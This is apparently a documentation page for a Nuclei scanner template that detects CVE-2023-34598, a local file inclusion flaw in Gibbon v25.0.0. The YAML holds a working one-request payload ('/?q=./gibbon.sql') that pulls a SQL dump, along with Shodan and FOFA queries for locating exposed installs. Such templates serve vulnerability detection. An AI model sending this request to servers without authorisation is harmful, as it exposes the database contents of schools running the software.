Gibbon v25.0.0 - Local File Inclusion
ID: CVE-2023-34598
Severity: critical
Author: DhiyaneshDk
Tags: cve2023,cve,gibbon,lfi,gibbonedu
Description
Section titled “Description”Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it’s possible to include the content of several files present in the installation folder in the server’s response.
YAML Source
Section titled “YAML Source”id: CVE-2023-34598
info: name: Gibbon v25.0.0 - Local File Inclusion author: DhiyaneshDk severity: critical description: | Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response. impact: | The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade to a patched version of Gibbon or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://github.com/maddsec/CVE-2023-34598 - https://twitter.com/shaybt12/status/1673612503547355137?s=20 - https://nvd.nist.gov/vuln/detail/CVE-2023-34598 - https://github.com/izj007/wechat - https://github.com/komodoooo/Some-things classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34598 cwe-id: CWE-22 epss-score: 0.02842 epss-percentile: 0.90694 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: gibbonedu product: gibbon shodan-query: - http.favicon.hash:-165631681 - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,lfi,gibbonedu
http: - method: GET path: - "{{BaseURL}}/?q=./gibbon.sql"
matchers-condition: and matchers: - type: word words: - "phpMyAdmin SQL Dump" - "gibbon" condition: and
- type: status status: - 200# digest: 4a0a004730450220161d05176d087ba6a0e791688763916f30b96e6b501715539fdfce204cea14a6022100a1c175f80cb6099713eef245ba6b797e22aa94955fa1760d648c7577db7c144d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-34598.yaml"